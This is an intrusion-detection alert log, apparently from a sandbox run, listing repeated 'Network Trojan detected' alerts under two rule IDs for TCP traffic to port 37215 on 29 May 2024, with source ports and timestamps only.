                SID:2835222
                Source Port:55778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.272036
                SID:2835222
                Source Port:58212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432082
                SID:2829579
                Source Port:39496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465551
                SID:2835222
                Source Port:39622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920435
                SID:2835222
                Source Port:41256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364512
                SID:2835222
                Source Port:54554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032513
                SID:2835222
                Source Port:52158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716130
                SID:2835222
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639839
                SID:2835222
                Source Port:54248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984838
                SID:2829579
                Source Port:43436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453512
                SID:2835222
                Source Port:51546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649668
                SID:2835222
                Source Port:38282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065155
                SID:2829579
                Source Port:52586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674884
                SID:2835222
                Source Port:56956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597057
                SID:2829579
                Source Port:37956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009586
                SID:2829579
                Source Port:38544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443171
                SID:2835222
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.442505
                SID:2835222
                Source Port:49260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551217
                SID:2829579
                Source Port:50522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226946
                SID:2835222
                Source Port:56580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667090
                SID:2829579
                Source Port:46632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276647
                SID:2829579
                Source Port:41854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.607531
                SID:2835222
                Source Port:40410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361464
                SID:2835222
                Source Port:42602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014667
                SID:2829579
                Source Port:33068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436241
                SID:2829579
                Source Port:41778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716946
                SID:2829579
                Source Port:58170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837408
                SID:2829579
                Source Port:36804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644970
                SID:2835222
                Source Port:59486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175390
                SID:2835222
                Source Port:36466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962843
                SID:2835222
                Source Port:43154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227651
                SID:2835222
                Source Port:38252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141015
                SID:2829579
                Source Port:40408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664457
                SID:2829579
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798632
                SID:2829579
                Source Port:60658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362944
                SID:2835222
                Source Port:58052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266168
                SID:2835222
                Source Port:50132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567434
                SID:2835222
                Source Port:47800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781939
                SID:2835222
                Source Port:39868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931839
                SID:2835222
                Source Port:39914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266392
                SID:2835222
                Source Port:46480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272371
                SID:2835222
                Source Port:38174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731621
                SID:2829579
                Source Port:41900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418421
                SID:2835222
                Source Port:55816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166178
                SID:2835222
                Source Port:44286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069670
                SID:2829579
                Source Port:37860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261600
                SID:2835222
                Source Port:50054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557097
                SID:2835222
                Source Port:43538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558251
                SID:2835222
                Source Port:55122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615194
                SID:2829579
                Source Port:46252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518037
                SID:2835222
                Source Port:41964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155184
                SID:2829579
                Source Port:55714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.565202
                SID:2835222
                Source Port:59848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097463
                SID:2835222
                Source Port:33264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264825
                SID:2835222
                Source Port:57876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587137
                SID:2835222
                Source Port:55096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946170
                SID:2835222
                Source Port:44914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784618
                SID:2835222
                Source Port:46652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520987
                SID:2829579
                Source Port:56354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184624
                SID:2835222
                Source Port:41674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432598
                SID:2829579
                Source Port:37038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189891
                SID:2829579
                Source Port:54966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739169
                SID:2835222
                Source Port:49818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689160
                SID:2835222
                Source Port:54918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363246
                SID:2829579
                Source Port:43016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963927
                SID:2835222
                Source Port:52542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461507
                SID:2829579
                Source Port:46092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947663
                SID:2835222
                Source Port:56840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547627
                SID:2829579
                Source Port:44054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.827462
                SID:2829579
                Source Port:33948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160857
                SID:2829579
                Source Port:57036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628332
                SID:2829579
                Source Port:57906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558605
                SID:2829579
                Source Port:51090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663827
                SID:2829579
                Source Port:36414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039852
                SID:2835222
                Source Port:42336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854356
                SID:2829579
                Source Port:60118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896963
                SID:2835222
                Source Port:49398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666051
                SID:2835222
                Source Port:45264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788405
                SID:2829579
                Source Port:32874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805850
                SID:2835222
                Source Port:49638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854401
                SID:2829579
                Source Port:46790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816345
                SID:2829579
                Source Port:56598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.932516
                SID:2829579
                Source Port:45728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689025
                SID:2829579
                Source Port:45992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365938
                SID:2835222
                Source Port:59312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986048
                SID:2829579
                Source Port:48932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140769
                SID:2829579
                Source Port:57098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022047
                SID:2835222
                Source Port:58708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948464
                SID:2829579
                Source Port:37336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066619
                SID:2829579
                Source Port:50470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856144
                SID:2835222
                Source Port:60452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915582
                SID:2835222
                Source Port:53138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624478
                SID:2835222
                Source Port:42290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687336
                SID:2829579
                Source Port:49938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032956
                SID:2835222
                Source Port:48422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526167
                SID:2835222
                Source Port:51092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686343
                SID:2835222
                Source Port:49098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164747
                SID:2835222
                Source Port:39860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997684
                SID:2835222
                Source Port:48142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453438
                SID:2829579
                Source Port:44540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631595
                SID:2829579
                Source Port:58516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037684
                SID:2829579
                Source Port:39680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562207
                SID:2835222
                Source Port:35670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840113
                SID:2829579
                Source Port:42758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331061
                SID:2829579
                Source Port:56190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001340
                SID:2829579
                Source Port:46058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685798
                SID:2829579
                Source Port:37608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507364
                SID:2835222
                Source Port:56204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239009
                SID:2835222
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543984
                SID:2829579
                Source Port:59218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027977
                SID:2829579
                Source Port:37392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210952
                SID:2829579
                Source Port:58662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560816
                SID:2829579
                Source Port:38948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281361
                SID:2829579
                Source Port:46034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856366
                SID:2835222
                Source Port:38066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965468
                SID:2829579
                Source Port:56588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.812107
                SID:2829579
                Source Port:43922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864999
                SID:2829579
                Source Port:36970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429300
                SID:2835222
                Source Port:48838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910352
                SID:2835222
                Source Port:43910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908069
                SID:2835222
                Source Port:44542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654832
                SID:2835222
                Source Port:43598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949468
                SID:2829579
                Source Port:59338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563589
                SID:2829579
                Source Port:33232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280506
                SID:2829579
                Source Port:53984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165302
                SID:2835222
                Source Port:34436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422404
                SID:2835222
                Source Port:35288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462282
                SID:2835222
                Source Port:53448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217782
                SID:2829579
                Source Port:33414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718482
                SID:2829579
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532282
                SID:2835222
                Source Port:55580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719949
                SID:2829579
                Source Port:40368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786975
                SID:2829579
                Source Port:37424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373987
                SID:2829579
                Source Port:53158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417849
                SID:2829579
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178751
                SID:2835222
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936438
                SID:2835222
                Source Port:60330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180378
                SID:2829579
                Source Port:55592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786655
                SID:2835222
                Source Port:51030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620851
                SID:2835222
                Source Port:57770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689571
                SID:2835222
                Source Port:51362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797956
                SID:2829579
                Source Port:47742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521720
                SID:2835222
                Source Port:53766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831314
                SID:2829579
                Source Port:42256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022127
                SID:2835222
                Source Port:55268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667259
                SID:2829579
                Source Port:58548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178305
                SID:2835222
                Source Port:54566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131692
                SID:2835222
                Source Port:41532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160202
                SID:2829579
                Source Port:59824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897073
                SID:2835222
                Source Port:44142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712936
                SID:2829579
                Source Port:56226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226644
                SID:2835222
                Source Port:40016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364658
                SID:2829579
                Source Port:36524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266090
                SID:2835222
                Source Port:60874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951119
                SID:2829579
                Source Port:51464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227588
                SID:2829579
                Source Port:51594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787656
                SID:2829579
                Source Port:51814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506363
                SID:2829579
                Source Port:44254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329525
                SID:2835222
                Source Port:42968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869694
                SID:2835222
                Source Port:34826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533231
                SID:2835222
                Source Port:40560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390706
                SID:2835222
                Source Port:46228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665086
                SID:2835222
                Source Port:59750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136251
                SID:2835222
                Source Port:35234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683789
                SID:2835222
                Source Port:52138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559396
                SID:2835222
                Source Port:34636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.080678
                SID:2829579
                Source Port:39762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799447
                SID:2835222
                Source Port:60424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038092
                SID:2835222
                Source Port:54990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785924
                SID:2829579
                Source Port:48606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532409
                SID:2829579
                Source Port:37506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926376
                SID:2835222
                Source Port:59120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326061
                SID:2829579
                Source Port:38722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739675
                SID:2835222
                Source Port:57896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795714
                SID:2829579
                Source Port:36692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782333
                SID:2829579
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964672
                SID:2829579
                Source Port:42874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217949
                SID:2829579
                Source Port:56594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762769
                SID:2835222
                Source Port:51784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715439
                SID:2829579
                Source Port:44912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162845
                SID:2829579
                Source Port:42666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962362
                SID:2835222
                Source Port:58628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361841
                SID:2835222
                Source Port:36364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227507
                SID:2835222
                Source Port:46388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791094
                SID:2835222
                Source Port:55390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944724
                SID:2829579
                Source Port:52546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841271
                SID:2835222
                Source Port:50162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579010
                SID:2835222
                Source Port:41370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.434890
                SID:2829579
                Source Port:45704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843207
                SID:2829579
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731354
                SID:2829579
                Source Port:47512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669514
                SID:2829579
                Source Port:44518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944007
                SID:2829579
                Source Port:60042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.872691
                SID:2829579
                Source Port:35696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141841
                SID:2835222
                Source Port:57466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261479
                SID:2829579
                Source Port:52036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990827
                SID:2829579
                Source Port:50308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790826
                SID:2835222
                Source Port:41528
                Destination Port:37215
